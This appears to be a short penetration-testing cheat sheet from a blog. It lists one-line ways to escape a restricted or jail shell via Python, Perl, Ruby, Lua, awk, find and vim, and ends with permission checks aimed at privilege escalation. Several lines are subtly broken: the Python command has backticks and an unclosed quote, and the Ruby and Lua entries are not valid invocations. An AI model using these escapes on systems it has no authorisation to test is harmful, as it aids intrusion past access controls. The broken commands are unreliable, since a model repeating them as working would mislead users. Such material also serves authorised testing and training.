Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Shell Harnesses

Spawning Interactive Shells

When landing on a system with a limited/jail shell, there are several alternative methods to spawn an interactive shell.

Methods

python

If Python is preset:

python -c `import pty; pty.spawn("/bin/sh)`

/bin/sh

Execute shell in interactive mode:

/bin/sh -i

Perl

If Perl is present:

perl -e 'exec "/bin/sh";'

Ruby

If Ruby is present:

ruby: exec "/bin/sh"

Lua

If Lua is present:

lua: os.execute('/bin/sh')

AWK

AWK is commonly available on Unix/Linux systems:

awk 'BEGIN {system("/bin/sh")}'

Find

Using the find command:

# Using find with awk
find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

# Direct execution
find . -exec /bin/sh \; -quit

VIM

From within VIM:

vim -c ':!/bin/sh'

Or escape to shell from VIM:

:set shell=/bin/sh
:shell

Execution Permissions Considerations

  • Check file permissions:

    ls -la <path/to/fileorbinary>

  • Check sudo permissions (requires stable interactive shell):

    sudo -l

Understanding permissions helps identify potential privilege escalation vectors.